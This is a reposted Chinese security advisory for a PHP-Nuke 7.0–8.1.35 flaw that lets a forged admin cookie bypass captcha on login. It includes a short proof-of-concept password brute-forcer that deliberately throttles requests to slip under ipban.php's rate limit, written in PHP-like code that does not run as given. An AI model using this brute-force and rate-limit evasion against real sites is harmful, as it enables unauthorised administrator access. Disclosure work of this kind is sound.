php绕过验证,PHP-Nuke绕过识别码验证漏洞
发布日期:2010-05-04
更新日期:2010-05-06
受影响系统:
PHP-Nuke PHP-Nuke 8.1.35
PHP-Nuke PHP-Nuke 8.1
PHP-Nuke PHP-Nuke 7.7
PHP-Nuke PHP-Nuke 7.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 39923
PHP-Nuke是一个广为流行的网站创建和管理工具,可使用很多数据库软件作为后端,如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。
PHP-Nuke可配置为要求识别码才可以登录,以防范暴力猜测攻击。但用户可以在提交给Web服务器的POST请求中提供伪造的Cookie来绕过识别码验证,获得非授权访问。
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$http=new http();
$x=0;
foreach $wordlist as $pass{
$http->cookie="admin=".base64_encode($admin_name.":".md5($pass).":").";";
$resp=$http->send("http://127.0.0.1/admin.php");
if(!strstr($resp,"Administration System Login")){
break;
}
//This stays below ipban.php's rate limit of less than 5 requests per 2 seconds.
if(!($x%4)){
sleep(2);
}
$x++;
}
if(!strstr($resp,"Administration System Login"))){
print "password:$pass\n";
}else{
print "password not found\n"
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
PHP-Nuke
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
php绕过验证,PHP-Nuke绕过识别码验证漏洞相关推荐
- 渗透测试-文件上传漏洞之MIME type验证原理和绕过
文件上传漏洞之MIME type验证原理和绕过 文章目录 文件上传漏洞之MIME type验证原理和绕过 前言 一.什么是MIME type 二.MIME type验证原理和绕过 1. MIME ty ...
- 使用DNS2TCP搭建DNS隧道,绕过网络认证,实现免验证上网
使用DNS2TCP搭建DNS隧道,绕过网络认证,实现免验证上网 正常情况下,当我们连上酒店或者其他需要验证才可以使用的网络后,虽然上不了网,但是我们的计算机却分配到了IP地址(不分配IP地址web认证 ...
- 验证码绕过(对验证码绕过的理解-----burpsuite)
Pikachu是一个带有漏洞的Web应用系统, 在这里包含了常见的web安全漏洞.通过一些资料认识这个练习的靶机平台.练习需要的条件是自己首先在电脑上下载并安装相关的工具.Burp suit.Phps ...
- 00截断上传绕过_上传绕过总结
欢迎各位关注我的专栏,在以后的时间里,我将分享更多技术,在这里你能学到很多知识和姿势.自我介绍:高级安全研究员|擅长Python\PHP\JAVA审计;SONRT规则;etc.|陈小兵著<SQL ...
- 计算机用电子表格验证方案,Excel电子表格的验证1.PDF
Excel电子表格的验证1.PDF IZ STUDIO IZ STUDIO OMCL 指南:计算机化系统验证 附录 1:Excel 电子表格的验证 1 Excel 电子表格的验证 注:本指南及其附录中 ...
- 机器学习(MACHINE LEARNING)交叉验证(简单交叉验证、k折交叉验证、留一法)
文章目录 1 简单的交叉验证 2 k折交叉验证 k-fold cross validation 3 留一法 leave-one-out cross validation 针对经验风险最小化算法的过拟合 ...
- yii 验证器类 细说YII验证器
在 yii-1.1.10.r3566 版本中,yii自带的验证器共有 19 个.全部如下: // CValidator.php public static $builtInValidators=arr ...
- sencha touch Model validations 自定义验证 二选一输入验证、重复验证、时间验证、比较验证、条件验证(2015-1-14)...
项目初始化时执行以下代码 1 //重写模型,方便进行自定义验证 2 Ext.define("Ext.zh.data.Model", { 3 override: "Ext. ...
- 【转】ASP.NET验证控件详解(非空验证,比较验证,范围验证,正则表达式,自定义验证)...
[转]ASP.NET验证控件详解(非空验证,比较验证,范围验证,正则表达式,自定义验证) ASP.NET验证控件详解 现在ASP.NET,你不但可以轻松的实现对用户输入的验证,而且,还可以选择验证在服 ...
最新文章
- 从特急到难产 光伏增补项目抢不抢630?
- 学习web前端你必须要了解的主流框架!
- Nature癌症“牵线木偶”理论:科学家找到了不易误伤健康细胞的“剪刀”
- cookie共享子域名
- Manjaro 安装笔记
- 决策树-特征属性选择划分
- 纽约州立大学石溪分校将理论物理研究所命名为“杨振宁理论物理研究所”
- Spring配置文件总结
- 关于文件的工具类例子
- Ubuntu平台采用Qemu搭建ARM虚拟机环境
- 13种常见软件体系结构风格定义分析、结构图、优缺点
- plsql导出数据字典
- 盘点前端开发常用的几款编辑器
- C语言-求绝对值-三目运算符
- 用wait¬ify实现多线程才是正确打开方式
- CSS系列之连续的字母或数字在Html盒子中不会自动换行,直接溢出
- 安卓盒子launcher界面开发之添加自动定位,获取当地天气
- Linux: fPIC与 pie 区别
- 结果集没有当前行的解决方法
- 图像分类篇——AlexNet详解
热门文章
- JS操作保存cookie(转载他人)
- 嘿嘿~~大家一起来测测自己反映速度
- Springboot2.0 集成 Elasticsearch 6.x 未添加 transport-netty4-client 依赖 启动时报错
- oracle dblink和dataguard,Oracle 建立 DBLINK
- c语言十六实验答案,《C语言》上机实验题及参考答案
- Hadoop1和Hadoop2的区别是什么?
- redis中各种数据类型对应的jedis操作命令
- Oracle 计划新的移动 OpenJDK 项目
- 列表页的动态条件搜索
- Pattern类与Matcher方法的验证